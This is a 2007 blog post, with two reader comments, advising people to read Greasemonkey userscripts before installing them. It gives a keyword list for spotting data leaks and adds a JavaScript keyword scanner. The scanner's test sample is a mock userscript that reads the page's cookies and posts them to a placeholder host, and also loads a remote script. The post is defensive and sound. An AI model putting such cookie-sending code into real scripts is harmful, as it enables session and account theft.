Thursday, October 11, 2007

Be careful while installing Greasemonkey scripts

I recommend viewing the source code before you install any Greasemonkey script in your browser.
If you are not familiar with JavaScript, check whether the script contains any of the following words (do a Ctrl+F):
1) "GM_xmlhttpRequest" (this can potentially send your data to third-party servers!)
2) "document.cookie" or "cookie" (do not allow third-party scripts to access/steal your cookie)
3) "script.src" (script src hacks can do much harm)

Though this list is not exhaustive, these words cover the majority of potential vulnerabilities. If in doubt, do not install the script.
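For scripts too long to search by hand, the same keyword check can be run programmatically and reported by line number. This is an added example, not code from the original post; the function names and the sample script are constructed for illustration, and since the list is not exhaustive an empty result is not proof that a script is safe.

```javascript
// The three search terms from the post, with the reason given for each.
const INDICATORS = [
  { name: "GM_xmlhttpRequest", pattern: /GM_xmlhttpRequest/i,
    reason: "can potentially send your data to third-party servers" },
  { name: "cookie", pattern: /cookie/i, // also matches document.cookie
    reason: "script touches cookies" },
  { name: "script.src", pattern: /script\s*\.\s*src/i,
    reason: "script src hacks can do much harm" },
];

// Returns one finding per (line, indicator) match; line numbers are 1-based.
function auditUserscript(source) {
  const findings = [];
  source.split(/\r?\n/).forEach((text, i) => {
    for (const ind of INDICATORS) {
      if (ind.pattern.test(text)) {
        findings.push({ line: i + 1, indicator: ind.name,
                        reason: ind.reason, text: text.trim() });
      }
    }
  });
  return findings;
}

// Summarize: any hit means the source needs a manual read before install.
function verdict(findings) {
  return findings.length === 0 ? "no listed keywords found"
                               : "review before installing";
}

// Constructed sample userscript (not a real script); hosts are placeholders.
const SAMPLE = [
  "// ==UserScript==",
  "// @name     Constructed sample",
  "// @include  *",
  "// ==/UserScript==",
  "var c = document.cookie;",
  'GM_xmlhttpRequest({ method: "POST", url: "https://collector.example/", data: c });',
  'var script = document.createElement("script");',
  'script.src = "https://cdn.example/lib.js";',
].join("\n");

const sampleFindings = auditUserscript(SAMPLE);
for (const f of sampleFindings) {
  console.log(`line ${f.line}: "${f.indicator}" (${f.reason}) -> ${f.text}`);
}
console.log(verdict(sampleFindings));
```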


Varun S said...

Very informative. I was able to figure out malicious scripts with some URLs in the code, but this will help even if the URL is obfuscated. It's still a PITA if the whole script is obfuscated.

Balaji said...

If the whole script is obfuscated, DO NOT INSTALL it.
Greasemonkey scripts are supposed to be free and open; obscure scripts have no place here.